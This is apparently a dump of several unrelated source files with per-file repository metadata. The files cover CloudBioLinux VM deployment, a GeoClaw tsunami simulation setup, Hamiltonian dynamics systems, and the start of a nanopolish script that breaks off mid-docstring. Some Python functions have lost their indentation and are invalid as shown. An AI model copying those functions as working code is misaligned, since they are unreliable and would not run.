                         "launch", # Dummy action justs launches image
                         "install_biolinux",
                         "install_custom",
                         "ssh",
                         "attach_ip",
                         "snapshot_volumes",
                         "attach_volumes",
                         "detach_volumes",
                         ]
    for action_type in ["local_actions", "configure_actions", "ready_action"]:
        for action in __get_plugin_actions(env, action_type):
            possible_actions.append(action)
    return possible_actions
def _do_perform_action(action, action_list):
do_perform = action in action_list
if do_perform:
action_list.remove(action)
return do_perform
def _setup_fabric(vm_launcher, ip, options):
    '''
    Point the global fabric environment at the target machine.

    ``options`` is currently unused.
    '''
    env.user = vm_launcher.get_user()
    env.hosts = [ip]
    env.key_filename = vm_launcher.get_key_file()
    # Skip known_hosts checks for freshly-created machines
    env.disable_known_hosts = True
def _setup_cloudbiolinux(options):
    '''
    Configure the cloudbiolinux fabric environment for the chosen flavor.
    '''
    def fabricrc_loader(env):
        # Deferred so that _configure_fabric_environment controls when the
        # rc properties are applied
        _setup_cloudbiolinux_fabric_properties(env, options)

    flavor = get_main_options_string(options, "flavor", DEFAULT_CLOUDBIOLINUX_FLAVOR)
    _configure_fabric_environment(env, flavor, fabricrc_loader=fabricrc_loader)
    _setup_image_user_data(env, options)
def _setup_cloudbiolinux_fabric_properties(env, options):
    '''
    Load fabricrc settings (explicit file or cloudbiolinux default) and
    apply any ``fabricrc_overrides`` from the deploy options.
    '''
    fabricrc_file = get_main_options_string(options, "fabricrc_file", None)
    env.config_dir = os.path.join(os.path.dirname(__file__), "..", "..", "config")
    env.tool_data_table_conf_file = os.path.join(env.config_dir, "..",
                                                 "installed_files",
                                                 "tool_data_table_conf.xml")
    if fabricrc_file:
        env.update(load_settings(fabricrc_file))
    else:
        # Let cloudbiolinux find out default file based on flavor, dist, etc...
        _parse_fabricrc(env)
    overrides = options.get("fabricrc_overrides", {})
    for key, value in overrides.iteritems():
        # yaml parses bools, wouldn't be expected coming out of a fabricrc
        # file so replace everything with a string.
        if isinstance(value, bool):
            overrides[key] = str(value)
    env.update(overrides)
    _setup_galaxy_env_defaults(env)
def _setup_image_user_data(env, options):
if "image_user_data" in options:
env["image_user_data_dict"] = options["image_user_data"]
def purge_genomes():
    '''Delete all installed genome data on the remote host.'''
    sudo("rm -rf %s" % env.data_files)
def configure_ssh_key(options):
    '''
    Install the configured SSH key into the galaxy user's ~/.ssh on the
    remote host (no-op when ``galaxy_ssh_key`` is absent).
    '''
    if "galaxy_ssh_key" in options:
        key_file = options["galaxy_ssh_key"]
        sudo("mkdir -p /home/%s/.ssh" % (env.galaxy_user))
        sudo("chmod 700 /home/%s/.ssh" % (env.galaxy_user))
        put(local_path=key_file,
            remote_path="/home/%s/.ssh/%s" % (env.galaxy_user, os.path.basename(key_file)),
            use_sudo=True,
            mode=0600)
        # Ensure the galaxy user owns its own .ssh directory
        _chown_galaxy(env, "/home/%s/.ssh" % env.galaxy_user)
def setup_biodata(options):
    '''
    Install reference genome data on the remote instance.

    ``options["genome_source"]`` selects the transfer mechanism
    ("default", "S3", or "rsync"); an unknown value raises KeyError.
    '''
    genome_source = options.get("genome_source", "default")
    # Pick the cloudbiolinux installer matching the requested source.
    # (Removed the dead 'install_proc = install_data' pre-assignment that
    # was immediately overwritten by this lookup.)
    install_proc = {
        "default": install_data,
        "S3": install_data_s3,
        "rsync": install_data_rsync,
    }[genome_source]
    if genome_source == "default":
        install_proc(options["genomes"], ["ggd", "s3", "raw"])
    else:
        install_proc(options["genomes"])
def configure_instance(options, actions):
    '''
    Dispatch the configuration-phase actions in a fixed order, letting
    plugins run between the built-in steps.
    '''
    if "install_biolinux" in actions:
        install_biolinux(options)
    if "install_custom" in actions:
        install_custom(options)
    if "purge_tools" in actions:
        purge_tools()
    __invoke_plugin_actions(env, actions, "configure_actions", [options])
    if "setup_tools" in actions:
        install_tools(options["tools"])
    if "setup_biodata" in actions:
        setup_biodata(options)
    if "setup_ssh_key" in actions:
        configure_ssh_key(options)
def install_custom(options):
    '''
    Install the single custom package named by ``options["package"]``.
    '''
    _install_custom(options.get("package"))
def install_biolinux(options):
    '''
    Run the full cloudbiolinux install for the configured flavor/target.
    '''
    _perform_install(
        target=options.get("target", DEFAULT_CLOUDBIOLINUX_TARGET),
        flavor=options.get("flavor", DEFAULT_CLOUDBIOLINUX_FLAVOR),
        more_custom_add=options.get("custom_add", None),
    )
def _interactive_ssh(vm_launcher):
    """ Launch an interactive SSH session to host described by vm_launcher object.
    """
    host = vm_launcher.get_ip()
    user = vm_launcher.get_user()
    key_file = vm_launcher.get_key_file()
    # NOTE(review): the command is built by string interpolation and run
    # with shell=True; host/user/key come from local deploy config, but
    # quoting would break on values containing single quotes.
    cmd = "ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -i '%s' -l '%s' '%s'" % (key_file, user, host)
    call(cmd, shell=True)
def transfer_files(options):
    '''
    Upload the configured (optionally compressed) files to the instance's
    /mnt/uploaded_data as the galaxy user.
    '''
    transfer_options = _build_transfer_options(options, "/mnt/uploaded_data", "galaxy")
    _do_transfer(transfer_options, options.get("files", []), options.get("compressed_files", []))
def _build_transfer_options(options, destination, user):
    """Collect transfer tuning parameters from ``options`` into a dict.

    Integer-valued options are read as strings and converted, matching the
    way main options are stored.
    """
    def int_option(key, default):
        return int(get_main_options_string(options, key, default))
    return {
        'compress': get_boolean_option(options, 'compress_transfers', True),
        'num_compress_threads': int_option('num_compress_threads', '1'),
        'num_transfer_threads': int_option('num_transfer_threads', '1'),
        'num_decompress_threads': int_option('num_decompress_threads', '1'),
        'chunk_size': int_option('transfer_chunk_size', '0'),
        'transfer_retries': int_option('transfer_retries', '3'),
        'local_temp': get_main_options_string(options, 'local_temp_dir', tempdir),
        'destination': destination,
        'transfer_as': user,
    }
def _do_transfer(transfer_options, files, compressed_files=None):
    """Transfer plain and compressed files using vm-launcher's manager.

    Raises ImportError when the optional vmlauncher dependency is absent.
    ``compressed_files`` defaults to an empty list; the None sentinel avoids
    the shared-mutable-default-argument pitfall of the previous signature.
    """
    if compressed_files is None:
        compressed_files = []
    if not FileTransferManager:
        raise ImportError("Require vmlauncher: https://github.com/jmchilton/vm-launcher")
    FileTransferManager(**transfer_options).transfer_files(files, compressed_files)
def purge_tools():
    """Delete the configured tool install directory (env.install_dir) on the host."""
    env.safe_sudo("rm -rf %s" % env.install_dir)
def install_tools(tools_conf):
    """
    Install the applications described by ``tools_conf`` on the target host.

    Delegates to ``_install_tools`` with the module-level Fabric ``env``.
    """
    _install_tools(env, tools_conf)
def get_boolean_option(options, name, default=False):
    """Return ``options[name]`` if present, otherwise ``default``.

    Note: despite the name, the stored value is returned as-is and is not
    coerced to bool (matching the original behavior).
    """
    return options.get(name, default)
def get_main_options_string(options, key, default=''):
    """Return the value stored under ``key`` in ``options``, or ``default``."""
    return options.get(key, default)
def __invoke_plugin_actions(env, actions, action_type, provided_args):
    """Dispatch requested actions to plugin handlers, consuming handled ones.

    Iterates over a snapshot of ``actions`` so entries can be removed from
    the live list as they are handled.
    """
    handlers = __get_plugin_actions(env, action_type)
    for requested in list(actions):
        if requested in handlers:
            __invoke_plugin_action(env, handlers[requested], provided_args)
            actions.remove(requested)
def __invoke_plugin_action(env, action_function, provided_args):
    """Call a plugin action, forwarding args only if its signature takes any."""
    if getargspec(action_function).args:
        action_function(*provided_args)
    else:
        action_function()
def __get_plugin_actions(env, action_type):
    """Collect the ``action_type`` handler maps from every plugin module.

    Returns a dict of action name -> callable. When several plugin modules
    define the same action name, the module seen later in
    ``__get_plugin_modules`` wins.
    """
    actions = {}
    for plugin_module in __get_plugin_modules(env):
        if hasattr(plugin_module, action_type):
            # Python 2 iteration over the plugin's name -> callable mapping.
            for action_name, action_function in getattr(plugin_module, action_type).iteritems():
                actions[action_name] = action_function
    return actions
def __get_plugin_modules(env):
    """Import the deploy plugin modules, memoizing the list on ``env``.

    Modules are loaded in reverse-sorted name order so that later-applied
    entries can override earlier ones. Plugins that fail to import are
    logged and skipped rather than aborting deployment.
    """
    if not "plugin_modules" in env:
        unsorted_module_names = __get_plugin_module_names( )
        ## Load modules in reverse order to allow hierarchical overrides
        module_names = sorted(unsorted_module_names, reverse=True)
        modules = []
        for plugin_module_name in module_names:
            try:
                module = __import__(plugin_module_name)
                # __import__ returns the top-level package; walk down the
                # dotted path to reach the leaf plugin module.
                for comp in plugin_module_name.split(".")[1:]:
                    module = getattr(module, comp)
                modules.append(module)
            except BaseException, exception:
                # Best effort: a broken plugin is reported, not fatal.
                exception_str = str(exception)
                message = "%s rule module could not be loaded: %s" % (plugin_module_name, exception_str)
                env.logger.warn(message)
                continue
        env.plugin_modules = modules
    return env.plugin_modules
def __get_plugin_module_names():
    """List dotted module names for each plugin .py file under cloudbio.deploy.plugins."""
    plugin_module_dir = cloudbio.deploy.plugins.__path__[0]
    return ["cloudbio.deploy.plugins.%s" % fname[:-len(".py")]
            for fname in os.listdir(plugin_module_dir)
            if not fname.startswith("_") and fname.endswith(".py")]
| heuermh/cloudbiolinux | cloudbio/deploy/__init__.py | Python | mit | 13,852 | [
"Galaxy"
] | e07b95ec6a33631b3a3794abf96bfc52274f36c9d85f37f4cdadfbc93508a506 |
../../../../share/pyshared/orca/flat_review.py | Alberto-Beralix/Beralix | i386-squashfs-root/usr/lib/python2.7/dist-packages/orca/flat_review.py | Python | gpl-3.0 | 46 | [
"ORCA"
] | 947a6d0d0c8ab4d46a8cdcc853f8c1e4e6eae2dadf14d05955868556d526a98c |
"""
Module to set up run time parameters for Clawpack -- AMRClaw code.
The values set in the function setrun are then written out to data files
that will be read in by the Fortran code.
"""
import os
import numpy as np
# Event timing thresholds (seconds) used below for gauges and region refinement.
t_shelf = 3.2*3600 # time approaching continental slope
t_harbor = 3.5*3600 # time approaching harbor
try:
    CLAW = os.environ['CLAW']
except:
    raise Exception("*** Must first set CLAW enviornment variable")
# Scratch directory for storing topo and dtopo files:
scratch_dir = os.path.join(CLAW, 'geoclaw', 'scratch')
#------------------------------
def setrun(claw_pkg='geoclaw'):
#------------------------------
    """
    Define the parameters used for running Clawpack.
    INPUT:
        claw_pkg expected to be "geoclaw" for this setrun.
    OUTPUT:
        rundata - object of class ClawRunData
    """
    from clawpack.clawutil import data
    assert claw_pkg.lower() == 'geoclaw', "Expected claw_pkg = 'geoclaw'"
    num_dim = 2
    rundata = data.ClawRunData(claw_pkg, num_dim)
    #------------------------------------------------------------------
    # GeoClaw specific parameters:
    #------------------------------------------------------------------
    rundata = setgeo(rundata)
    #------------------------------------------------------------------
    # Adjoint specific data:
    #------------------------------------------------------------------
    rundata = setadjoint(rundata)
    #------------------------------------------------------------------
    # Standard Clawpack parameters to be written to claw.data:
    #------------------------------------------------------------------
    clawdata = rundata.clawdata # initialized when rundata instantiated
    # Set single grid parameters first.
    # See below for AMR parameters.
    # ---------------
    # Spatial domain:
    # ---------------
    # Number of space dimensions:
    clawdata.num_dim = num_dim
    # Lower and upper edge of computational domain (longitude/latitude degrees):
    clawdata.lower[0] = 140.0 # xlower
    clawdata.upper[0] = 250.0 # xupper
    clawdata.lower[1] = 10.0 # ylower
    clawdata.upper[1] = 62.0 # yupper
    # Number of grid cells:
    clawdata.num_cells[0] = 110 # mx
    clawdata.num_cells[1] = 52 # my
    # ---------------
    # Size of system:
    # ---------------
    # Number of equations in the system:
    clawdata.num_eqn = 3
    # Number of auxiliary variables in the aux array (initialized in setaux)
    clawdata.num_aux = 3
    # Index of aux array corresponding to capacity function, if there is one:
    clawdata.capa_index = 2
    # -------------
    # Initial time:
    # -------------
    clawdata.t0 = 0.0
    # Restart from checkpoint file of a previous run?
    # Note: If restarting, you must also change the Makefile to set:
    # RESTART = True
    # If restarting, t0 above should be from original run, and the
    # restart_file 'fort.chkNNNNN' specified below should be in
    # the OUTDIR indicated in Makefile.
    clawdata.restart = False # True to restart from prior results
    clawdata.restart_file = 'fort.chk00006' # File to use for restart data
    # -------------
    # Output times:
    #--------------
    # Specify at what times the results should be written to fort.q files.
    # Note that the time integration stops after the final output time.
    clawdata.output_style = 1
    if clawdata.output_style==1:
        # Output ntimes frames at equally spaced times up to tfinal:
        # Can specify num_output_times = 0 for no output
        clawdata.num_output_times = 22
        clawdata.tfinal = 11*3600.
        clawdata.output_t0 = False # output at initial (or restart) time?
    elif clawdata.output_style == 2:
        # Specify a list or numpy array of output times:
        # Include t0 if you want output at the initial time.
        clawdata.output_times = list(np.linspace(3600,3600*9,9))
    elif clawdata.output_style == 3:
        # Output every step_interval timesteps over total_steps timesteps:
        clawdata.output_step_interval = 1
        clawdata.total_steps = 1
        clawdata.output_t0 = True # output at initial (or restart) time?
    clawdata.output_format = 'binary' # 'ascii', 'binary', 'netcdf'
    clawdata.output_q_components = 'all' # could be list such as [True,True]
    clawdata.output_aux_components = 'none' # could be list
    clawdata.output_aux_onlyonce = True # output aux arrays only at t0
    # ---------------------------------------------------
    # Verbosity of messages to screen during integration:
    # ---------------------------------------------------
    # The current t, dt, and cfl will be printed every time step
    # at AMR levels <= verbosity. Set verbosity = 0 for no printing.
    # (E.g. verbosity == 2 means print only on levels 1 and 2.)
    clawdata.verbosity = 0
    # --------------
    # Time stepping:
    # --------------
    # if dt_variable==True: variable time steps used based on cfl_desired,
    # if dt_variable==False: fixed time steps dt = dt_initial always used.
    clawdata.dt_variable = True
    # Initial time step for variable dt.
    # (If dt_variable==0 then dt=dt_initial for all steps)
    clawdata.dt_initial = 1
    # Max time step to be allowed if variable dt used:
    clawdata.dt_max = 1e+99
    # Desired Courant number if variable dt used
    clawdata.cfl_desired = 0.75
    # max Courant number to allow without retaking step with a smaller dt:
    clawdata.cfl_max = 1.0
    # Maximum number of time steps to allow between output times:
    clawdata.steps_max = 5000
    # ------------------
    # Method to be used:
    # ------------------
    # Order of accuracy: 1 => Godunov, 2 => Lax-Wendroff plus limiters
    clawdata.order = 2
    # Use dimensional splitting? (not yet available for AMR)
    clawdata.dimensional_split = 'unsplit'
    # For unsplit method, transverse_waves can be
    # 0 or 'none' ==> donor cell (only normal solver used)
    # 1 or 'increment' ==> corner transport of waves
    # 2 or 'all' ==> corner transport of 2nd order corrections too
    clawdata.transverse_waves = 2
    # Number of waves in the Riemann solution:
    clawdata.num_waves = 3
    # List of limiters to use for each wave family:
    # Required: len(limiter) == num_waves
    # Some options:
    # 0 or 'none' ==> no limiter (Lax-Wendroff)
    # 1 or 'minmod' ==> minmod
    # 2 or 'superbee' ==> superbee
    # 3 or 'vanleer' ==> van Leer
    # 4 or 'mc' ==> MC limiter
    clawdata.limiter = ['vanleer', 'vanleer', 'vanleer']
    clawdata.use_fwaves = True # True ==> use f-wave version of algorithms
    # Source terms splitting:
    # src_split == 0 or 'none' ==> no source term (src routine never called)
    # src_split == 1 or 'godunov' ==> Godunov (1st order) splitting used,
    # src_split == 2 or 'strang' ==> Strang (2nd order) splitting used, not recommended.
    clawdata.source_split = 1
    # --------------------
    # Boundary conditions:
    # --------------------
    # Number of ghost cells (usually 2)
    clawdata.num_ghost = 2
    # Choice of BCs at xlower and xupper:
    # 0 or 'user' => user specified (must modify bcNamr.f to use this option)
    # 1 or 'extrap' => extrapolation (non-reflecting outflow)
    # 2 or 'periodic' => periodic (must specify this at both boundaries)
    # 3 or 'wall' => solid wall for systems where q(2) is normal velocity
    clawdata.bc_lower[0] = 'extrap' # at xlower
    clawdata.bc_upper[0] = 'extrap' # at xupper
    clawdata.bc_lower[1] = 'extrap' # at ylower
    clawdata.bc_upper[1] = 'extrap' # at yupper
    # ---------------
    # gauges:
    # ---------------
    gauges = rundata.gaugedata.gauges
    # for gauges append lines of the form [gaugeno, x, y, t1, t2]
    # Gauges only record once the wave nears them (t1 = t_shelf/t_harbor).
    # Outside harbor:
    gauges.append([1, 235.536, 41.67, t_shelf, 1.e10])
    # Inside harbor:
    gauges.append([2, 235.80917,41.74111,t_harbor, 1.e10])
    # --------------
    # Checkpointing:
    # --------------
    # Specify when checkpoint files should be created that can be
    # used to restart a computation.
    clawdata.checkpt_style = 0
    if clawdata.checkpt_style == 0:
        # Do not checkpoint at all
        pass
    elif clawdata.checkpt_style == 1:
        # Checkpoint only at tfinal.
        pass
    elif clawdata.checkpt_style == 2:
        # Specify a list of checkpoint times.
        clawdata.checkpt_times = [0.1,0.15]
    elif clawdata.checkpt_style == 3:
        # Checkpoint every checkpt_interval timesteps (on Level 1)
        # and at the final time.
        clawdata.checkpt_interval = 5
    # ---------------
    # AMR parameters: (written to amr.data)
    # ---------------
    amrdata = rundata.amrdata
    # max number of refinement levels:
    amrdata.amr_levels_max = 4
    # List of refinement ratios at each level (length at least amr_level_max-1)
    amrdata.refinement_ratios_x = [5, 6, 6, 3, 30]
    amrdata.refinement_ratios_y = [5, 6, 6, 3, 30]
    amrdata.refinement_ratios_t = [5, 6, 6, 3, 4]
    # Specify type of each aux variable in amrdata.auxtype.
    # This must be a list of length num_aux, each element of which is one of:
    # 'center', 'capacity', 'xleft', or 'yleft' (see documentation).
    amrdata.aux_type = ['center', 'capacity', 'yleft']
    # Flag for refinement based on Richardson error estimater:
    amrdata.flag_richardson = False # use Richardson?
    amrdata.flag_richardson_tol = 1.0 # Richardson tolerance
    # Flag for refinement using routine flag2refine:
    amrdata.flag2refine = True # use this?
    amrdata.flag2refine_tol = 0.004 # tolerance used in this routine
    # Note: this tolerance is not used in the surface-flagging method
    # only the wave_tolerance is used (a geoclaw specific parameters)
    # steps to take on each level L between regriddings of level L+1:
    amrdata.regrid_interval = 3
    # width of buffer zone around flagged points:
    # (typically the same as regrid_interval so waves don't escape):
    amrdata.regrid_buffer_width = 2
    # clustering alg. cutoff for (# flagged pts) / (total # of cells refined)
    # (closer to 1.0 => more small grids may be needed to cover flagged cells)
    amrdata.clustering_cutoff = 0.7
    # print info about each regridding up to this level:
    amrdata.verbosity_regrid = 0
    # ---------------
    # Regions:
    # ---------------
    regions = rundata.regiondata.regions
    # to specify regions of refinement append lines of the form
    # [minlevel,maxlevel,t1,t2,x1,x2,y1,y2]
    regions.append([1, 1, 0., 1e9, 0, 360, -90, 90]) #whole world
    regions.append([1, 3, 0., 7*3600., 0, 360, -90, 90]) #whole world
    regions.append([1, 3, 7*3600.,10*3600., 170., 360, 18, 90])
    regions.append([1, 3, 10*3600.,1e9, 195., 360, -90, 90])
    regions.append([4, 4, 0., 1800, 175, 195, 50, 54]) #earthquake source AASZ04
    regions.append([3, 4, t_shelf, 1e9, 235, 238, 34, 43]) # between shelf and CC
    regions.append([4, 4, t_shelf, 1e9, 235, 236, 41, 42])
    regions.append([5, 5, t_shelf, 1e9, 235.5,235.83,41.6,41.8]) #only harbor
    regions.append([5, 6, t_harbor, 1e9, 235.78,235.84,41.735,41.775]) #only harbor
    # ----- For developers -----
    # Toggle debugging print statements:
    amrdata.dprint = False # print domain flags
    amrdata.eprint = False # print err est flags
    amrdata.edebug = False # even more err est flags
    amrdata.gprint = False # grid bisection/clustering
    amrdata.nprint = False # proper nesting output
    amrdata.pprint = False # proj. of tagged points
    amrdata.rprint = False # print regridding summary
    amrdata.sprint = False # space/memory output
    amrdata.tprint = False # time step reporting each level
    amrdata.uprint = False # update/upbnd reporting
    return rundata
# end of function setrun
# ----------------------
#-------------------
def setgeo(rundata):
#-------------------
"""
Set GeoClaw specific runtime parameters.
"""
try:
geo_data = rundata.geo_data
except:
print "*** Error, this rundata has no geo_data attribute"
raise AttributeError("Missing geo_data attribute")
# == Physics ==
geo_data.gravity = 9.81
geo_data.coordinate_system = 2
geo_data.earth_radius = 6367500.0
# == Forcing Options
geo_data.coriolis_forcing = False
# == Algorithm and Initial Conditions ==
tide_stage = 77.
geo_data.sea_level = (tide_stage - 77.)/100. # m relative to MHW
geo_data.dry_tolerance = 0.001
geo_data.friction_forcing = True
geo_data.manning_coefficient = 0.025
geo_data.friction_depth = 100.0
# Refinement settings
refinement_data = rundata.refinement_data
refinement_data.variable_dt_refinement_ratios = True
refinement_data.wave_tolerance = 0.14
refinement_data.deep_depth = 100.0
refinement_data.max_level_deep = 4
# == settopo.data values ==
topofiles = rundata.topo_data.topofiles
# for topography, append lines of the form
# [topotype, minlevel, maxlevel, t1, t2, fname]
topofiles.append([3, 1, 1, 0., 1.e10, \
scratch_dir + '/etopo1min170E124W40N61N.asc'])
topofiles.append([3, 1, 1, 0., 1.e10, \
scratch_dir + '/etopo4min120E110W0N62N.asc'])
topofiles.append([-3, 1, 1, 32000, 1.e10, scratch_dir + '/cc-1sec-c.asc'])
topofiles.append([3, 1, 1, 32000, 1.e10, scratch_dir + '/cc-1_3sec-c_pierless.asc'])
# == setdtopo.data values ==
rundata.dtopo_data.dtopofiles = []
dtopofiles = rundata.dtopo_data.dtopofiles
# for moving topography, append lines of the form :
# [topotype, minlevel,maxlevel,fname]
dtopodir = scratch_dir + '/'
dtopotype = 3
fname = dtopodir + 'AASZ04v2.tt3'
dtopofiles.append([dtopotype, 3, 3, fname])
# == setqinit.data values ==
rundata.qinit_data.qinit_type = 0
rundata.qinit_data.qinitfiles = []
qinitfiles = rundata.qinit_data.qinitfiles
# for qinit perturbations, append lines of the form: (<= 1 allowed for now!)
# [minlev, maxlev, fname]
# == fixedgrids.data values ==
rundata.fixed_grid_data.fixedgrids = []
fixedgrids = rundata.fixed_grid_data.fixedgrids
# for fixed grids append lines of the form
# [t1,t2,noutput,x1,x2,y1,y2,xpoints,ypoints,\
# ioutarrivaltimes,ioutsurfacemax]
# == fgmax.data values ==
fgmax_files = rundata.fgmax_data.fgmax_files
return rundata
# end of function setgeo
# ----------------------
#-------------------
def setadjoint(rundata):
#-------------------
    """
    Register the checkpointed adjoint snapshot files with the run data.

    Scans adjoint/_output for fort.tck* time-stamp files (sorted by name),
    reads the snapshot time from each, and records the matching fort.chk*
    checkpoint path and time as numbered adjoint.data parameters.
    """
    import glob
    files = glob.glob("adjoint/_output/fort.tck*")
    files.sort()
    probdata = rundata.new_UserData(name='adjointdata',fname='adjoint.data')
    probdata.add_param('numadjoints', len(files), 'Number of adjoint checkpoint files.')
    for counter, fname in enumerate(files, 1):
        # Close each time-stamp file promptly instead of leaking the handle.
        with open(fname) as f:
            # Snapshot time is the last whitespace-separated token of line 1.
            time = f.readline().split()[-1]
        fname = '../' + fname.replace('tck','chk')
        probdata.add_param('file' + str(counter), fname, 'Checkpoint file' + str(counter))
        probdata.add_param('time' + str(counter), float(time), 'Time for file' + str(counter))
    return rundata
# end of function setadjoint
# ----------------------
if __name__ == '__main__':
    # Set up run-time parameters and write all data files.
    # An optional first CLI argument overrides the claw_pkg passed to setrun.
    import sys
    rundata = setrun(*sys.argv[1:])
    rundata.write()
"NetCDF"
] | e1568ba3e238b2471f032e9c3f1b5472fa875c3d8167726519aee7859a53de1d |
# Copyright 2020 DeepMind Technologies Limited.
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A module with all Hamiltonian systems that have analytic solutions."""
from typing import Any, Optional, Tuple
from dm_hamiltonian_dynamics_suite.hamiltonian_systems import hamiltonian
from dm_hamiltonian_dynamics_suite.hamiltonian_systems import phase_space
from dm_hamiltonian_dynamics_suite.hamiltonian_systems import utils
import jax.numpy as jnp
import jax.random as jnr
class PotentialFreeSystem(hamiltonian.TimeIndependentHamiltonianSystem):
  """A system where the potential energy is 0 and the kinetic is quadratic.
  The Hamiltonian is:
      p^T M p / 2
  where M (``params["matrix"]``) is a positive semi-definite matrix sampled
  once per system instance.
  Constructor parameters:
    eigen_values_range - range the factor eigenvalues of M are sampled from
        (either scalar, or one entry per system dimension).
    init_vector_range - box from which the initial phase-space state (q, p)
        is sampled uniformly.
  """
  def __init__(
      self,
      system_dims: int,
      eigen_values_range: utils.BoxRegion,
      init_vector_range: utils.BoxRegion,
      **kwargs):
    super().__init__(system_dims=system_dims, **kwargs)
    # dims == 0 means a scalar range shared by all dimensions.
    if eigen_values_range.dims != 0 and eigen_values_range.dims != system_dims:
      raise ValueError(f"The eigen_values_range must be of the same dimensions "
                       f"as the system dimensions, but is "
                       f"{eigen_values_range.dims}.")
    if init_vector_range.dims != 0 and init_vector_range.dims != system_dims:
      raise ValueError(f"The init_vector_range must be of the same dimensions "
                       f"as the system dimensions, but is "
                       f"{init_vector_range.dims}.")
    self.eigen_values_range = eigen_values_range
    self.init_vector_range = init_vector_range
  def _hamiltonian(
      self,
      y: phase_space.PhaseSpace,
      params: utils.Params,
      **kwargs: Any
  ) -> jnp.ndarray:
    """Evaluates H(q, p) = p^T M p / 2 (purely kinetic)."""
    assert len(params) == 1
    matrix = params["matrix"]
    potential = 0
    kinetic = jnp.sum(jnp.matmul(y.p, matrix) * y.p, axis=-1) / 2
    return potential + kinetic
  def sample_y(
      self,
      num_samples: int,
      params: utils.Params,
      rng_key: jnp.ndarray,
      **kwargs: Any
  ) -> phase_space.PhaseSpace:
    """Samples initial states uniformly from ``init_vector_range``."""
    # Sample random state
    y = jnr.uniform(rng_key, [num_samples, 2 * self.system_dims],
                    dtype=self.dtype)
    y = self.init_vector_range.convert_from_unit_interval(y)
    return phase_space.PhaseSpace.from_state(y)
  def sample_params(
      self,
      num_samples: int,
      rng_key: jnp.ndarray,
      **kwargs: Any
  ) -> utils.Params:
    """Samples a random PSD matrix M = (Q e)(Q e)^T per system instance."""
    key1, key2 = jnr.split(rng_key)
    matrix_shape = [num_samples, self.system_dims, self.system_dims]
    gaussian = jnr.normal(key1, matrix_shape)
    # QR of a Gaussian matrix yields an orthogonal factor Q.
    q, _ = jnp.linalg.qr(gaussian)
    eigs = jnr.uniform(key2, [num_samples, self.system_dims])
    eigs = self.eigen_values_range.convert_from_unit_interval(eigs)
    q_eigs = q * eigs[..., None]
    # NOTE(review): the eigenvalues of the resulting matrix are the *squares*
    # of the sampled values in eigen_values_range -- confirm this is intended.
    matrix = jnp.matmul(q_eigs, jnp.swapaxes(q_eigs, -2, -1))
    return dict(matrix=matrix)
  def simulate_analytically(
      self,
      y0: phase_space.PhaseSpace,
      t0: utils.FloatArray,
      t_eval: jnp.ndarray,
      params: utils.Params,
      **kwargs: Any
  ) -> Optional[phase_space.PhaseSpace]:
    """Closed form free motion: q(t) = q0 + M p0 (t - t0), p constant.

    Returns None when friction is enabled, since no closed form is used then.
    """
    if self.friction != 0.0:
      return None
    assert len(params) == 1
    matrix = params["matrix"]
    t = utils.expand_to_rank_right(t_eval - t0, y0.q.ndim + 1)
    q = y0.q[None] + utils.vecmul(matrix, y0.p)[None] * t
    p = y0.p[None] * jnp.ones_like(t)
    return phase_space.PhaseSpace(position=q, momentum=p)
  def canvas_bounds(self) -> utils.BoxRegion:
    # This abstract system has no visual rendering.
    raise NotImplementedError()
  def canvas_position(
      self,
      position: jnp.ndarray,
      params: utils.Params
  ) -> jnp.ndarray:
    raise NotImplementedError()
  def render_trajectories(
      self,
      position: jnp.ndarray,
      params: utils.Params,
      rng_key: jnp.ndarray,
      **kwargs: Any
  ) -> Tuple[jnp.ndarray, utils.Params]:
    raise NotImplementedError()
class KineticFreeSystem(PotentialFreeSystem):
  """A system where the kinetic energy is 0 and the potential is quadratic.
  The Hamiltonian is:
      q^T M q / 2
  where M (``params["matrix"]``) is a positive semi-definite matrix sampled
  once per system instance (see PotentialFreeSystem.sample_params, which is
  inherited along with the constructor and state sampling).
  """
  def _hamiltonian(
      self,
      y: phase_space.PhaseSpace,
      params: utils.Params,
      **kwargs: Any
  ) -> jnp.ndarray:
    """Evaluates H(q, p) = q^T M q / 2 (purely potential)."""
    assert len(params) == 1
    matrix = params["matrix"]
    potential = jnp.sum(jnp.matmul(y.q, matrix) * y.q, axis=-1) / 2
    kinetic = 0
    return potential + kinetic
  def simulate_analytically(
      self,
      y0: phase_space.PhaseSpace,
      t0: utils.FloatArray,
      t_eval: jnp.ndarray,
      params: utils.Params,
      **kwargs: Any
  ) -> Optional[phase_space.PhaseSpace]:
    """Closed form: q constant, p(t) = p0 - M q0 (t - t0).

    Returns None when friction is enabled, since no closed form is used then.
    """
    if self.friction != 0.0:
      return None
    assert len(params) == 1
    matrix = params["matrix"]
    t = utils.expand_to_rank_right(t_eval - t0, y0.q.ndim + 1)
    q = y0.q[None] * jnp.ones_like(t)
    p = y0.p[None] - utils.vecmul(matrix, y0.q)[None] * t
    return phase_space.PhaseSpace(position=q, momentum=p)
  def canvas_bounds(self) -> utils.BoxRegion:
    # This abstract system has no visual rendering.
    raise NotImplementedError()
  def canvas_position(
      self,
      position: jnp.ndarray,
      params: utils.Params
  ) -> jnp.ndarray:
    raise NotImplementedError()
  def render_trajectories(
      self,
      position: jnp.ndarray,
      params: utils.Params,
      rng_key: jnp.ndarray,
      **kwargs: Any
  ) -> Tuple[jnp.ndarray, utils.Params]:
    raise NotImplementedError()
| deepmind/dm_hamiltonian_dynamics_suite | dm_hamiltonian_dynamics_suite/hamiltonian_systems/simple_analytic.py | Python | apache-2.0 | 6,192 | [
"Gaussian"
] | 0afc2e7533d1ffee0a548f8a420589ee57059b897c0bbf1fb3f2d5e06a4dc9da |
#! /usr/bin/env python3
"""
reestimate_polya_emissions.py: given two `polya-samples` TSV files based on different
underlying kmer models (with the newer TSV giving failing poly(A) segmentations),
infer the best new parameters for the HMM emissions.
Usage:
$ python reestimate_polya_emissions.py samples.old.tsv seg.old.tsv samples.new.tsv
where:
* `samples.old.tsv` is the output of `nanopolish polya -vv [...] | grep 'polya-samples'`,
generated by the **old** kmer models;
* `seg.old.tsv` is the output of `nanopolish polya -v [...] | grep 'polya-segmentation'`,
generated by the **old** kmer models;
